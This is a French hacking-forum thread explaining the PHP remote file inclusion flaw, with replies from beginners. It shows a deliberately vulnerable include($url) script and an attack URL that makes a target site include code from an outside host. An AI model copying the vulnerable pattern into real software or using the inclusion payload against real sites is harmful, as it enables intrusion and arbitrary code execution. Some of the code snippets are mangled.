FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
* La faille include *

 
Répondre au sujet    FranceHack Index du Forum » Failles et Exploits » PHP Sujet précédent
Sujet suivant
* La faille include *
Auteur Message
scorpionhack80
Invité

Hors ligne




Message * La faille include * Répondre en citant
* La faille include *  

 
1)La fonction include  
***************  
 
En php pour inclure un fichier dans un autre on fait :  

 
include("fichier.txt"); ?>  

ou :   
 
$url = "fichier.txt"; // on se sert de la variable $url include($url);
?>  

 
on encore :  
include("http://www.google.fr/index.html");
?>

 
Dans ce cas google sera rajouter a votre index .  

deuxieme cas on peut aussi faire :   
 
include("http://www.tonsite.com/fichier.txt"); ?>  

2)La faille Include  
*******************  
Si un webmaster fait sur son site un script index de se style :  
if($url) { // si url est defini include($url); // on inclue la valeur contenu // dans $url
}
else {
include("accueil.php"); // si $url n'est pas defini on
// inclue accueil.php qui est
// la page par defaut
}
?>  


Quand on accede a la page d'acceil on a :  
http://www.cible.com/index.php Puisque $url n'a pas de parametre il va inclure le fichier par defaut qui est
accueil.php si on lui donne :
http://www.cible.com/index.php?url=contact.php il va inclure si elle existe la page contact.php  


Voila on se rapproche du hack  
imaginons que le hacker fasse:  
 
-------------------------------------------------------------------- http://www.cible.com/index.php?url=http://www.url.com/fichier.txt |
--------------------------------------------------------------------  

 
cette personne va pouvoir executer n'importe quelle commande php grace a son fichier qui se trouve sur
http://www.url.com/fichier.txt


Voila maintenant vous pouvez glissez n'importe quel code arbitraire  
dans la page sans probleme, je vous laisse imaginer le reste 
 
 
 



Lun 23 Mai - 01:45 (2011)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Lun 23 Mai - 01:45 (2011)
KBtarantino
Invité

Hors ligne




Message * La faille include * Répondre en citant
C pas une faille php sa


Dim 29 Mai - 22:26 (2011)
scorpionhack80
Invité

Hors ligne




Message * La faille include * Répondre en citant
je suis pas un pro comme toi, s'est juste pour aider les gens fait une recherche sur la faille include tu me dira aprés si s'est pas une faille php.


Lun 30 Mai - 10:18 (2011)
x03ad
Invité

Hors ligne




Message * La faille include * Répondre en citant
C`est bien une faille php mais elle est trop bien connue maintenant...lol


Ven 25 Mai - 22:24 (2012)
Groscalin
Invité

Hors ligne




Message * La faille include * Répondre en citant
On peut toujours utiliser Backtrack 5 pour trouver les failles. Y'a même les outils pour les exploiter : d enfer Ça pourrait faire un tuto ça.


Dim 26 Aoû - 20:16 (2012)
Mugiwara
Invité

Hors ligne




Message * La faille include * Répondre en citant
J'ai déjà lu ça dans d'autre site mais à chaque fois, il y a quelque chose que je ne comprenait pas ;


- http://www.cible.com/index.php?url=http://www.url.com/fichier.txt | 


J'avais à peu près compris jusque là mais à ce moment, il y a 2 url qui apparaissent ! La première j'ai compris, puisque c'est la cible, mais la deuxième, je vois pas d'ou elle vient et à quoi elle sert. 
A la fin vous dites que c'est par l'intermédiaire de la 2 ème URL que vous pouvez y mettre des codes. 
Etant Novice je n'ai pas compris, pourriez-vous m'expliquez s'il vous plaît ?


Mar 22 Oct - 23:12 (2013)
Groscalin
Invité

Hors ligne




Message * La faille include * Répondre en citant
J'ai déjà lu ça dans d'autre site mais à chaque fois, il y a quelque chose que je ne comprenait pas ;


- |


J'avais à peu près compris jusque là mais à ce moment, il y a 2 url qui apparaissent ! La première j'ai compris, puisque c'est la cible, mais la deuxième, je vois pas d'ou elle vient et à quoi elle sert.
A la fin vous dites que c'est par l'intermédiaire de la 2 ème URL que vous pouvez y mettre des codes.
Etant Novice je n'ai pas compris, pourriez-vous m'expliquez s'il vous plaît ?
La seconde URL est le code a inclure dans index.php


Jeu 24 Oct - 19:53 (2013)
Mugiwara
Invité

Hors ligne




Message * La faille include * Répondre en citant
Ah ok Merci ! 


Jeu 24 Oct - 20:13 (2013)
Contenu Sponsorisé






Message * La faille include *

Aujourd’hui à 01:12 (2016)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Failles et Exploits » PHP Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com